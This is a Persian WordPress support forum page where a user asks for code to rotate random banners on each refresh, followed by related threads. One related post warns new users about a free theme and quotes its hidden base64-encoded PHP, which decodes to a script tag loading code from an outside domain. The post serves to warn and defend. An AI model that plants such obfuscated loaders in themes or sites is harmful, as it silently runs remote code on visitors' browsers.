mgfx

درخواست کد عکس تصادفی

2 پست در این موضوع قرار دارد

سلام من میخوام تو یه قمستی از سایتم یه بنر بذارم که دراصل چندتا بنره یعنی

با هربار رفرش یه بنر بیاد کد همچین چیزی رو میخوام

یعنی به کدی ادرس چندتا بنر بدی که با هربار رفرش صفحه به صورت تصادفی یکی از اون بنرهارو نشون بده.چون با گذاشتن چندین بنر هم سایت زشت میشه و هم سنگین میشه

به اشتراک گذاری این پست

لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

• مطالب مشابه

• توسط maryam300
      سلام آیا کدی هست که با درج آن در متن نوشته یا برگه، عنوان اون نوشته یا برگه در متنش بیافته. مثلا عنوان برگه "وردپرس" هست. در متن اون برگه نوشته بشه. " سلام <وردپرس> "
    • توسط just_ali
      با سلام خدمت دوستان و استاتید 
      من یک مشکلی فنی در بخش اندازه ی اعاد عکس های در صفحه ی فروشگاه ووکارمس دارم و با هر روشی هم که تست میکنم درست نمیشه 
      من از افزونه regenerato هم ساتفاده کردم که کلا تمام عکس ها ازجمله نمادک سایت فروشگاه و برند سایت و تبلیغ و خلاصه همه رو خراب کرد
      الان واقعا نمیدونم باید چیکار کنم 
      این لینک سایت من هست http://servatland.com/shop 
      این هم چند تا عکس گذاشتم از وضعیت خراب فروشگاه به خاطر عکس های نا منظم 
      من هنوز نتونستم سایتم رو راه بندازم به خاطر این عکس ها و الان همه جا رو گشتسم 
      خواهشا اگر کسی میتونه کمکم کنید بهم بگید خیلی ممنون میشم خیلی به کمک نیاز دارم

• توسط just_ali
      با سلام
      دوستان من یک مشکلی فنی دارم در بخش تغیی تصاویر در ووکامرس هر کاری میکنم تغییر نمیکنه 
      از افزونه 
      Regenerate
      هم اسفاده کردم برای کوچک کردن عکس ها ولی تغییر نمیکنه حتی از بخش پیکربندی-محصولات هم اندازه ها تغییر دادم ولی هیچ اتفاقی نیفتاد
      خواهش میکنم کمکم کنید بخش محصولاتم کلا به هم ریخته شده 
      این عکسی هست که در بخش فروشگاه ووکامرس اپلود کردم ولی هر کاری کردم تغییر نکرد
      http://servatland.com/product/we-can-promise-you/
      اگه باید کدی اضافه کنم لطفا دقیقا بگین کجا باید این کار را انجام بدم چون من از کد نویس اطلاعی ندارم
    • توسط mojtabashahi
      امروز قصد دارم دو ضرب المثل را که از "گربه" استفاده کرده اند برای شما یادآوری نمایم. و یک هشدار به کاربران "تازه وارد" وردپرس بدهم.
      1 . گربه را دم حجله باید کشت. سایت : www.dorcel.ir ، باید همین اول جلوی فعالیت چنین سایت هایی گرفته شود.
      2 . هیچ گربه ای محض رضای خدا موش نمی گیرد. داخل فایل های یکی از پوسته هایی که رایگان برای دانلود قرار داده شده کد (انکد base64) زیر وجود دارد : 
      <?php $str = 'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cDovL2JveC5kb3JjZWwuaXIvZG9yY2VsLnBocCc+PC9zY3JpcHQ+'; echo base64_decode($str); که بعد از دیکد می شود : 
      <script type='text/javascript' src='http://box.dorcel.ir/dorcel.php'>  
      پ.ن : ....
    • توسط smz9999
      سلام دوستان
      توی سایتم وقتی اشاره گر موس روی هرکدوم از پست هل بره توضیحاتی اون پست نمایش داده میشه !
      ولی توی قسمت پایین تک نوشته ها که مطالب تصادفی قرار داره وقتی موس روی نوشته های تصادفی میره جای اینکه توضیحات پست مربوطه نشون داده بشه ، توضیحات همین پستی که بازه نشون داده میشه !
      چجوری باید درستش کنم ؟
      ادرس سایت : max-movie2.in